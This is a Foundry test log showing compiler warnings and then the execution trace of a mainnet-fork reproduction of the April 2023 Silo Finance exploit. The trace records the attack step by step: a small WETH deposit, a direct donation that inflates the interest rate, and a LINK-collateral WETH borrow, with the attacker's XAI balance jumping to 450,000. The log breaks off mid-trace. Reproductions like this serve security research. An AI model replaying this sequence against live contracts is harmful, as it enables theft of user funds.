Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.34s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-04/silo_finance_exp.sol:53:5:
   |
53 |     IERC20 public constant WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-04/silo_finance_exp.sol:83:5:
   |
83 |     IERC20 public constant WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
   --> src/test/2023-04/silo_finance_exp.sol:146:9:
    |
146 |         address WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    |         ^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.10s (1.73ms CPU time)

Ran 1 test for src/test/2023-04/silo_finance_exp.sol:SiloBugFixReviewTest
[PASS] testAttack() (gas: 1179315)
Logs:
  time stamp before =  1682622215
  block number before =  17139470
  Balance of XAI before exploit=  0
  WETH interest rate before exploit =  0
  time stamp after =  1682622239
  block number after =  17139471
  Balance of XAI after exploit=  450000000000000000000000
  WETH interest rate after exploit =  65536000000000000000000

Traces:
  [1827158] SiloBugFixReviewTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 17139470 [1.713e7])
    │   └─ ← [Return] 0
    ├─ [1236577] → new SiloBugFixReview@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─ [397644] → new OtherAccount@0x104fBc016F4bb334D775a19E8A6510109AC63E00
    │   │   └─ ← [Return] 1873 bytes of code
    │   └─ ← [Return] 4026 bytes of code
    ├─ [569] SiloBugFixReview::WETH() [staticcall]
    │   └─ ← [Return] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   └─ ← [Return] [0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60], []
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, slot: 5825609806085329600055018438565692856737946360302145295836091025613143833952 [5.825e75])
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, fsig: 0x70a08231, keysHash: 0x996b860ef646da948c7d745162e3851398cba818db7bc8c7a4d9d465a54dfa11, slot: 5825609806085329600055018438565692856737946360302145295836091025613143833952 [5.825e75])
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60, 0x0000000000000000000000000000000000000000000000000de0b6b3a76586a0)
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← [Return] 1000000000000100000 [1e18]
    ├─ [548] SiloBugFixReview::LINK() [staticcall]
    │   └─ ← [Return] 0x514910771AF9Ca656af840dff83E8264EcF986CA
    ├─ [592] SiloBugFixReview::otherAccount() [staticcall]
    │   └─ ← [Return] OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]
    ├─ [2655] 0x514910771AF9Ca656af840dff83E8264EcF986CA::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [655] 0x514910771AF9Ca656af840dff83E8264EcF986CA::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(0x514910771AF9Ca656af840dff83E8264EcF986CA)
    │   └─ ← [Return] [0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736], []
    ├─ [0] VM::load(0x514910771AF9Ca656af840dff83E8264EcF986CA, 0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: 0x514910771AF9Ca656af840dff83E8264EcF986CA, slot: 50778707728992698651676234890746123480073179820931751572655924317407025698614 [5.077e76])
    ├─ [0] VM::load(0x514910771AF9Ca656af840dff83E8264EcF986CA, 0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [655] 0x514910771AF9Ca656af840dff83E8264EcF986CA::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0x514910771AF9Ca656af840dff83E8264EcF986CA, 0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [655] 0x514910771AF9Ca656af840dff83E8264EcF986CA::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(0x514910771AF9Ca656af840dff83E8264EcF986CA, 0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0x514910771AF9Ca656af840dff83E8264EcF986CA, fsig: 0x70a08231, keysHash: 0x720e1b3d800394033de075a1fff553b62904feb588458fd6c44df09740b51a98, slot: 50778707728992698651676234890746123480073179820931751572655924317407025698614 [5.077e76])
    ├─ [0] VM::load(0x514910771AF9Ca656af840dff83E8264EcF986CA, 0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(0x514910771AF9Ca656af840dff83E8264EcF986CA, 0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736, 0x00000000000000000000000000000000000000000000001d8b64f4775be40000)
    │   └─ ← [Return]
    ├─ [655] 0x514910771AF9Ca656af840dff83E8264EcF986CA::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   └─ ← [Return] 545000000000000000000 [5.45e20]
    └─ ← [Stop]

  [1259815] SiloBugFixReviewTest::testAttack()
    ├─ [0] console::log("time stamp before = ", 1682622215 [1.682e9]) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("block number before = ", 17139470 [1.713e7]) [staticcall]
    │   └─ ← [Stop]
    ├─ [786403] SiloBugFixReview::run()
    │   ├─ [13825] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::assetStorage(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   └─ ← [Return] AssetStorage({ collateralToken: 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F, collateralOnlyToken: 0x0c4B770843faFd7F5Aa1eA9EFa662AD62b78C95a, debtToken: 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e, totalDeposits: 0, collateralOnlyDeposits: 0, totalBorrowAmount: 0 })
    │   ├─ [60571] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::accrueInterest(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   │   ├─ [7301] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::isSiloPaused(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [2872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   ├─ [32285] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRateAndUpdate(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 1682622215 [1.682e9])
    │   │   │   ├─ [1163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063da6de3
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [2439] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::protocolShareFee() [staticcall]
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   ├─  storage changes:
    │   │   │   @ 0x00137c28eabea4eda5601e544e6551e6761ee561d32c4142c29e0f892835a363: 0x0000000000000000000000000000000000000000000000010000000063da6de3 → 0x00000000000000000000000000000000000000000000000100000000644ac707
    │   │   └─ ← [Return] 0
    │   ├─ [2559] 0xd7C9F0e536dC865Ae858b0C0453Fe76D13c3bEAc::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [0] console::log("Balance of XAI before exploit= ", 0) [staticcall]
    │   │   └─ ← [Stop]
    │   ├─ [0] console::log("WETH interest rate before exploit = ", 0) [staticcall]
    │   │   └─ ← [Stop]
    │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 100000 [1e5])
    │   │   ├─ emit Approval(owner: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, value: 100000 [1e5])
    │   │   ├─  storage changes:
    │   │   │   @ 0xd23454bcb4ee99fb5eb59649363a3cbde73aea7181e2a176dcdbf11998ace95d: 0 → 100000
    │   │   └─ ← [Return] true
    │   ├─ [137292] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::deposit(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 100000 [1e5], false)
    │   │   ├─ [1301] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::isSiloPaused(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [2579] 0xb02F981c5231Ecf80A67BB50D24c79ED4d95822e::balanceOf(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2349] 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F::totalSupply() [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [49323] 0x2A011fCAA007c840a0b34593D00CB4Ab9f2f067F::mint(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 100000 [1e5])
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 100000 [1e5])
    │   │   │   ├─ [305] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::siloRepository() [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000d998c35b7900b344bbbe6555cc11576942cf309d
    │   │   │   ├─ [2642] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getNotificationReceiver(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 2: 0 → 100000
    │   │   │   │   @ 0x996b860ef646da948c7d745162e3851398cba818db7bc8c7a4d9d465a54dfa11: 0 → 100000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [30848] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 100000 [1e5])
    │   │   │   ├─ emit Transfer(from: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, value: 100000 [1e5])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xd23454bcb4ee99fb5eb59649363a3cbde73aea7181e2a176dcdbf11998ace95d: 100000 → 0
    │   │   │   │   @ 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60: 0x0000000000000000000000000000000000000000000000000de0b6b3a76586a0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   @ 0xcceb29b887411bad822af7c617d87ca00620b0813897c3e3bb802f007e7c5a66: 0 → 100000
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit Deposit(param0: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param1: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], param2: 100000 [1e5], param3: false)
    │   │   ├─ [2426] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::priceProvidersRepository() [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000007c2ca9d502f2409beceafa68e97a176ff805029f
    │   │   ├─ [2718] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaxSiloDepositsValue(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   ├─ [2444] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::decimals() [staticcall]
    │   │   │   └─ ← [Return] 18
    │   │   ├─ [450] 0x7C2ca9D502f2409BeceAfa68E97a176Ff805029F::getPrice(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   ├─  storage changes:
    │   │   │   @ 0x67aa9b7d2b6d14f3837d07b1073399a41e4104b1d98f169f02cc04f44f14f4b3: 0 → 100000
    │   │   └─ ← [Return] 100000 [1e5], 100000 [1e5]
    │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 1000000000000000000 [1e18])
    │   │   ├─ emit Transfer(from: SiloBugFixReview: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, value: 1000000000000000000 [1e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0ce12da53e0bbcec8d2a75a7df18dfd3593b3d971c21bd9738c534e226d67d60: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0
    │   │   │   @ 0xcceb29b887411bad822af7c617d87ca00620b0813897c3e3bb802f007e7c5a66: 100000 → 0x0000000000000000000000000000000000000000000000000de0b6b3a76586a0
    │   │   └─ ← [Return] true
    │   ├─ [525511] OtherAccount::depositLinkAndBorrowWETH()
    │   │   ├─ [2655] 0x514910771AF9Ca656af840dff83E8264EcF986CA::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   └─ ← [Return] 545000000000000000000 [5.45e20]
    │   │   ├─ [24795] 0x514910771AF9Ca656af840dff83E8264EcF986CA::approve(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 545000000000000000000 [5.45e20])
    │   │   │   ├─ emit Approval(owner: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], spender: 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, value: 545000000000000000000 [5.45e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x92d10686f7982117952b3be34396bff2ce672033796db1c4b00c115fb07c4ecc: 0 → 0x00000000000000000000000000000000000000000000001d8b64f4775be40000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [193597] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::deposit(0x514910771AF9Ca656af840dff83E8264EcF986CA, 545000000000000000000 [5.45e20], true)
    │   │   │   ├─ [3301] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::isSiloPaused(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [2872] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getInterestRateModel(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000007e9e7ea94e1ff36e216a703d6d66ece356a5fd44
    │   │   │   ├─ [36283] 0x7e9e7ea94e1ff36e216a703D6D66eCe356a5fd44::getCompoundInterestRateAndUpdate(0x514910771AF9Ca656af840dff83E8264EcF986CA, 1682622215 [1.682e9])
    │   │   │   │   ├─ [5163] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::utilizationData(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000032d6285a98bd5d009ae00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064190d17
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [439] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::protocolShareFee() [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   │   ├─ [2579] 0xC81CF1ff5bB586CD54328ae9563572061cA7b481::balanceOf(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2349] 0x4e27963C016573a5571939404217A3241Af00C7A::totalSupply() [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [47323] 0x4e27963C016573a5571939404217A3241Af00C7A::mint(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], 545000000000000000000 [5.45e20])
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], value: 545000000000000000000 [5.45e20])
    │   │   │   │   ├─ [305] 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C::siloRepository() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000d998c35b7900b344bbbe6555cc11576942cf309d
    │   │   │   │   ├─ [642] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getNotificationReceiver(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 2: 0 → 0x00000000000000000000000000000000000000000000001d8b64f4775be40000
    │   │   │   │   │   @ 0x720e1b3d800394033de075a1fff553b62904feb588458fd6c44df09740b51a98: 0 → 0x00000000000000000000000000000000000000000000001d8b64f4775be40000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [11900] 0x514910771AF9Ca656af840dff83E8264EcF986CA::transferFrom(OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 545000000000000000000 [5.45e20])
    │   │   │   │   ├─ emit Transfer(from: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], to: 0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, value: 545000000000000000000 [5.45e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x92d10686f7982117952b3be34396bff2ce672033796db1c4b00c115fb07c4ecc: 0x00000000000000000000000000000000000000000000001d8b64f4775be40000 → 0
    │   │   │   │   │   @ 0x7043bae652c970425560f5ef12e16fb0f44ad00f0d3354ec7a452e0d8ed61736: 0x00000000000000000000000000000000000000000000001d8b64f4775be40000 → 0
    │   │   │   │   │   @ 0x8399f10b7ad664e0424efcfe9075b15123396d5a11c834f2ee8f134a6840e428: 0x00000000000000000000000000000000000000000000032d6285a98bd5d009ae → 0x00000000000000000000000000000000000000000000034aedea9e0331b409ae
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Deposit(param0: 0x514910771AF9Ca656af840dff83E8264EcF986CA, param1: OtherAccount: [0x104fBc016F4bb334D775a19E8A6510109AC63E00], param2: 545000000000000000000 [5.45e20], param3: true)
    │   │   │   ├─ [426] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::priceProvidersRepository() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000007c2ca9d502f2409beceafa68e97a176ff805029f
    │   │   │   ├─ [718] 0xd998C35B7900b344bbBe6555cc11576942Cf309d::getMaxSiloDepositsValue(0xcB3B879aB11F825885d5aDD8Bf3672596d35197C, 0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   └─ ← [Return] 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   ├─ [267] 0x514910771AF9Ca656af840dff83E8264EcF986CA::decimals() [staticcall]
    │   │   │   │   └─ ← [Return] 18
    │   │   │   ├─ [31382] 0x7C2ca9D502f2409BeceAfa68E97a176Ff805029F::getPrice(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   ├─ [25669] 0xe37B8c83138caF12E57632D19c06Eb561D47e423::getPrice(0x514910771AF9Ca656af840dff83E8264EcF986CA) [staticcall]
    │   │   │   │   │   ├─ [15643] 0xDC530D9457755926550b59e8ECcdaE7624181557::latestRoundData() [staticcall]
    │   │   │   │   │   │   ├─ [7410] 0xbba12740DE905707251525477bAD74985DeC46D2::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 7043, 3744129091082580 [3.744e15], 1682607875 [1.682e9], 1682607875 [1.682e9], 7043
    │   │   │   │   │   │   └─ ← [Return] 73786976294838213507 [7.378e19], 3744129091082580 [3.744e15], 1682607875 [1.682e9], 1682607875 [1.682e9], 73786976294838213507 [7.378e19]
    │   │   │   │   │   ├─ [1140] 0xDC530D9457755926550b59e8ECcdaE7624181557::decimals() [staticcall]
    │   │   │   │   │   │   ├─ [298] 0xbba12740DE905707251525477bAD74985DeC46D2::decimals() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000d4d43fc779954
